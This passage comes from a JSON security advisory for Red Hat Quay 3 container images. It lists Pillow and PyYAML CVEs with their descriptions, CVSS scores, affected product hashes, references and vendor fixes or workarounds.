"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-pillow: uncontrolled resource consumption in FpxImagePlugin.py"
},
{
"cve": "CVE-2019-20477",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2020-02-21T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1806005"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was discovered in the PyYAML library, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. An attacker could use this flaw to execute arbitrary code on the system by abusing the python/object/apply constructor.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "PyYAML: command execution through python/object/apply constructor in FullLoader",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue did not affect the versions of PyYAML as shipped with Red Hat Enterprise Linux 7, and 8 as they did not include the class FullLoader, which contains this vulnerability.\n\nThe PyYAML libary that is provided in the Red Hat OpenStack repositories is vulnerable. However, because there are no instances where this library is used in a way which exposes the vulnerability, the impact to OpenStack products has been reduced to \u0027low\u0027 and Red Hat will not be providing a fix at this time. Any updates will be through RHEL channels.\n\nRed Hat Quay 3.2 uses the vulnerable load function, but only to parse the Nginx configuration file, which only contains trusted data.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2019-20477"
},
{
"category": "external",
"summary": "RHBZ#1806005",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1806005"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2019-20477",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20477"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-20477",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20477"
}
],
"release_date": "2019-11-18T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-02-04T16:14:00+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
},
{
"category": "workaround",
"details": "Use `yaml.safe_load` or the SafeLoader loader when you parse untrusted input.",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "PyYAML: command execution through python/object/apply constructor in FullLoader"
},
{
"cve": "CVE-2020-5310",
"cwe": {
"id": "CWE-122",
"name": "Heap-based Buffer Overflow"
},
"discovery_date": "2020-01-03T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1789538"
}
],
"notes": [
{
"category": "description",
"text": "libImaging/TiffDecode.c in Pillow before 6.2.2 has a TIFF decoding integer overflow, related to realloc.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Integer overflow leading to buffer overflow in ImagingLibTiffDecode",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue did not affect the versions of python-pillow as shipped with Red Hat Enterprise Linux 5, 6, 7, and 8 as they did not include support for tiled TIFF images, where the flaw lies.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-5310"
},
{
"category": "external",
"summary": "RHBZ#1789538",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789538"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-5310",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-5310"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-5310",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-5310"
}
],
"release_date": "2020-01-03T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-02-04T16:14:00+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-pillow: Integer overflow leading to buffer overflow in ImagingLibTiffDecode"
},
{
"cve": "CVE-2020-5311",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2020-01-03T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1789535"
}
],
"notes": [
{
"category": "description",
"text": "An out-of-bounds write flaw was discovered in python-pillow in the way SGI RLE images are decoded. An application that uses python-pillow to decode untrusted images may be vulnerable to this flaw, which can allow an attacker to crash the application or potentially execute code on the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: out-of-bounds write in expandrow in libImaging/SgiRleDecode.c",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue did not affect the versions of python-pillow and python-imaging as shipped with Red Hat Enterprise Linux 6, and 7 as they did not include the SGI RLE image decoder, where the flaw lies.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-5311"
},
{
"category": "external",
"summary": "RHBZ#1789535",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789535"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-5311",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-5311"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-5311",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-5311"
}
],
"release_date": "2020-01-03T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-02-04T16:14:00+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-pillow: out-of-bounds write in expandrow in libImaging/SgiRleDecode.c"
},
{
"cve": "CVE-2020-5312",
"cwe": {
"id": "CWE-119",
"name": "Improper Restriction of Operations within the Bounds of a Memory Buffer"
},
"discovery_date": "2020-01-03T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1789533"
}
],
"notes": [
{
"category": "description",
